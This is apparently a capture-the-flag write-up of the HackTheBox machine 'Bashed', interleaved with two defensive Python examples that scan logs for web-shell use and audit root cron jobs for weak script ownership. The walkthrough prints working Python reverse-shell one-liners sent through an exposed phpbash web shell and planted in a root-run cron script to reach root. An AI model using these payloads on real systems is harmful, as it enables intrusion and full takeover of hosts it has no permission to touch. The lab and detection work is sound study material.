HTB: Bashed
Next after Netmon is Bashed; I don’t know anything about it. I do wonder if it’s shellshock though, just based on the name.
Ports
HTTP only. Makes it easy, no?
HTTP
On the webpage we get some information about something called phpbash, and there is a link to a GitHub repo where we can inspect the code. Essentially it takes the command from a POST request and passes it straight to PHP's shell_exec. We need to find it on the website; a quick run with dirsearch turns up /dev, and that is where we find what we're after.
http://10.10.10.68/dev/phpbash.php
We can send it commands; I use Burp Repeater to get myself a reverse shell:
POST /dev/phpbash.php?cmd=id HTTP/1.1
Host: 10.10.10.68
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 252
Origin: http://10.10.10.68
Connection: close
Referer: http://10.10.10.68/dev/phpbash.php?cmd=id
cmd=cd /var/www/html/dev; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.9",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
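From the defender's side, a web shell like this leaves a clear trail in the access log: requests to a known shell filename, and query strings carrying a command parameter. The following is an added example, not code from the post or from phpbash, that scans constructed Apache combined-format log lines for exactly those signs. The log lines, the list of shell filenames and the parameter names are all assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format lines for the example (not from the box).
SAMPLE_LOG = """\
10.10.14.9 - - [07/Mar/2021:00:20:01 +0000] "GET /dev/ HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.10.14.9 - - [07/Mar/2021:00:20:05 +0000] "POST /dev/phpbash.php?cmd=id HTTP/1.1" 200 312 "http://10.10.10.68/dev/phpbash.php" "Mozilla/5.0"
10.10.14.9 - - [07/Mar/2021:00:20:09 +0000] "GET /index.html HTTP/1.1" 200 7743 "-" "Mozilla/5.0"
10.10.14.9 - - [07/Mar/2021:00:20:12 +0000] "GET /uploads/x.php?c=cat%20/etc/passwd HTTP/1.1" 200 512 "-" "curl/7.74.0"
"""

# Common log format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)

# Assumed watch-lists: the shell seen on this box plus parameter names
# web shells commonly use to carry the command to run.
SHELL_NAMES = {"phpbash.php"}
CMD_PARAMS = {"cmd", "c", "exec", "command"}
# A value that starts with, or chains into, a typical shell binary.
CMD_HINTS = re.compile(r"(?:^|[;|& ])(?:id|whoami|cat|python|nc|bash|sh)\b")


def classify(line):
    """Return (ip, method, target, reasons) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    parts = urlsplit(target)
    reasons = []
    if parts.path.rsplit("/", 1)[-1] in SHELL_NAMES:
        reasons.append("known web-shell path")
    for name, values in parse_qs(parts.query).items():
        if name in CMD_PARAMS:
            reasons.append(f"command parameter '{name}'")
            if any(CMD_HINTS.search(v) for v in values):
                reasons.append("shell command in parameter value")
    if not reasons:
        return None
    return (m.group("ip"), m.group("method"), target, reasons)


def scan(log_text):
    """Classify every line and keep only the suspicious ones."""
    hits = []
    for line in log_text.splitlines():
        result = classify(line)
        if result is not None:
            hits.append(result)
    return hits


if __name__ == "__main__":
    for ip, method, target, reasons in scan(SAMPLE_LOG):
        print(f"{ip} {method} {target}: {', '.join(reasons)}")
```

One caveat the example makes visible: the access log records the request line only, so a command sent solely in the POST body (as the body of the Burp request above does) never appears there. The request on this box carried `cmd=id` in the query string as well, which is what the scanner catches; body-only traffic needs a WAF log, mod_security audit log or PHP-level logging instead.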
On the box
I check sudo -l and find I can do whatever I want as scriptmanager; so I become scriptmanager.
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.68] 40400
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@bashed:/var/www/html/dev$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
www-data@bashed:/var/www/html/dev$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/var/www/html/dev$ cd ~
cd ~
scriptmanager@bashed:~$ pwd
pwd
/home/scriptmanager
That’s all well and good, but I need to know what scriptmanager has access to. I search for files:
scriptmanager@bashed:/$ find . -user scriptmanager 2>/dev/null
find . -user scriptmanager 2>/dev/null
./scripts
./scripts/test.py
./home/scriptmanager
./home/scriptmanager/.profile
./home/scriptmanager/.bashrc
./home/scriptmanager/.nano
./home/scriptmanager/.bash_history
./home/scriptmanager/.bash_logout
# etc, including about a million /proc
Right; what’s test.py?
scriptmanager@bashed:/scripts$ ls -lash
ls -lash
total 16K
4.0K drwxrwxr-- 2 scriptmanager scriptmanager 4.0K Dec 4 2017 .
4.0K drwxr-xr-x 23 root root 4.0K Dec 4 2017 ..
4.0K -rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py
4.0K -rw-r--r-- 1 root root 12 Mar 7 00:22 test.txt
scriptmanager@bashed:/scripts$ cat test.txt
cat test.txt
testing 123!scriptmanager@bashed:/scripts$ cat test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$
Two interesting things to note here. One, we own the python script. Two, root owns the output and it was created very recently. I check /etc/crontab but there is nothing interesting. I wait a minute or two, and a new copy of test.txt is created. So it is being run by a root cron job. That's our in:
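The misconfiguration here is a classic one: a job that runs as root executes a script that root does not own, inside a directory that root does not own either. An audit for it is straightforward, and the following is an added example (not code from the post) that checks an /etc/crontab-style file for root jobs whose script, or the directory holding the script, is owned by another user or writable by group/other. The crontab text, the uid 1001 and the file modes are constructed for the example; `stat_lookup` is the hook you would use against a live host.

```python
import os
import shlex
import stat
from dataclasses import dataclass
from typing import Callable, Iterator, List, Optional, Tuple


@dataclass(frozen=True)
class FileInfo:
    path: str
    uid: int
    mode: int  # permission bits only, e.g. 0o644


Lookup = Callable[[str], Optional[FileInfo]]


def stat_lookup(path: str) -> Optional[FileInfo]:
    """Lookup backed by the live filesystem; use this on a real host."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return FileInfo(path, st.st_uid, stat.S_IMODE(st.st_mode))


# Constructed /etc/crontab for the example. The test.py line mirrors
# what the box must have had; the rest is invented filler.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* *     * * *   root    python /scripts/test.py
0 3     * * *   root    /usr/local/bin/backup.sh
@reboot         root    /usr/local/bin/backup.sh --verify
*/5 *   * * *   backup  /home/backup/sync.sh
"""

# Constructed ownership/mode table standing in for the filesystem.
# uid 1001 plays scriptmanager; /scripts is drwxrwxr-- as in the ls output.
SAMPLE_FILES = {
    "/scripts": FileInfo("/scripts", 1001, 0o774),
    "/scripts/test.py": FileInfo("/scripts/test.py", 1001, 0o644),
    "/usr/local/bin": FileInfo("/usr/local/bin", 0, 0o755),
    "/usr/local/bin/backup.sh": FileInfo("/usr/local/bin/backup.sh", 0, 0o755),
    "/etc/cron.hourly": FileInfo("/etc/cron.hourly", 0, 0o755),
}


def sample_lookup(path: str) -> Optional[FileInfo]:
    return SAMPLE_FILES.get(path)


def parse_system_crontab(text: str) -> Iterator[Tuple[str, str]]:
    """Yield (user, command) for each job line of a system crontab."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split()[0]:
            continue  # environment assignment such as PATH=...
        if line.startswith("@"):  # @reboot, @daily, ...: 3 fields
            parts = line.split(None, 2)
            if len(parts) < 3:
                continue
        else:  # five time fields, user, command
            parts = line.split(None, 6)
            if len(parts) < 7:
                continue
        yield parts[-2], parts[-1]


def weak_points(info: FileInfo, what: str) -> List[str]:
    """Reasons a file root will execute could be tampered with by others."""
    reasons = []
    if info.uid != 0:
        reasons.append(f"{what} {info.path} owned by uid {info.uid}, not root")
    if info.mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append(f"{what} {info.path} writable by group/other (mode {info.mode:04o})")
    return reasons


def audit_root_cron(crontab_text: str, lookup: Lookup) -> List[Tuple[str, str, List[str]]]:
    """Return (script, command, reasons) for every root job with a weak script."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for token in shlex.split(command):
            if not token.startswith("/") or token == "/":
                continue  # only absolute paths are checked
            info = lookup(token)
            if info is None:
                continue
            reasons = weak_points(info, "script")
            parent = lookup(os.path.dirname(token))
            if parent is not None:
                # Owning the directory is enough to delete and replace the script.
                reasons += weak_points(parent, "directory")
            if reasons:
                findings.append((token, command, reasons))
    return findings


if __name__ == "__main__":
    for script, command, reasons in audit_root_cron(SAMPLE_CRONTAB, sample_lookup):
        print(f"{script} (from '{command}'):")
        for r in reasons:
            print("  -", r)
```

Run against the real system with `audit_root_cron(open("/etc/crontab").read(), stat_lookup)`; per-user crontabs under /var/spool/cron and the /etc/cron.d fragments use the same format and can be fed through the same function. The directory check matters as much as the file check: on this box the file itself is only 644, and it is scriptmanager's ownership of /scripts that makes the rm-and-recreate in the next step possible.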
scriptmanager@bashed:/scripts$ rm test.py
rm test.py
scriptmanager@bashed:/scripts$ printf 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.9",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\n' >> test.py
scriptmanager@bashed:/scripts$
We don’t have to wait long:
┌──(root💀kali)-[/opt/htb/bashed]
└─# nc -nvlp 1235 1
listening on [any] 1235 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.68] 36520
/bin/sh: 0: can't access tty; job control turned off
# id;hostname
uid=0(root) gid=0(root) groups=0(root)
bashed
# cd /root
# ls -lash
total 32K
4.0K drwx------ 3 root root 4.0K Dec 4 2017 .
4.0K drwxr-xr-x 23 root root 4.0K Dec 4 2017 ..
4.0K -rw------- 1 root root 1 Dec 23 2017 .bash_history
4.0K -rw-r--r-- 1 root root 3.1K Dec 4 2017 .bashrc
4.0K drwxr-xr-x 2 root root 4.0K Dec 4 2017 .nano
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -r-------- 1 root root 33 Dec 4 2017 root.txt
4.0K -rw-r--r-- 1 root root 66 Dec 4 2017 .selected_editor
# cat root.txt
flag goes here
Pretty simple. Strictly speaking Traceback would be next but I’ve done that, so Nibbles it is.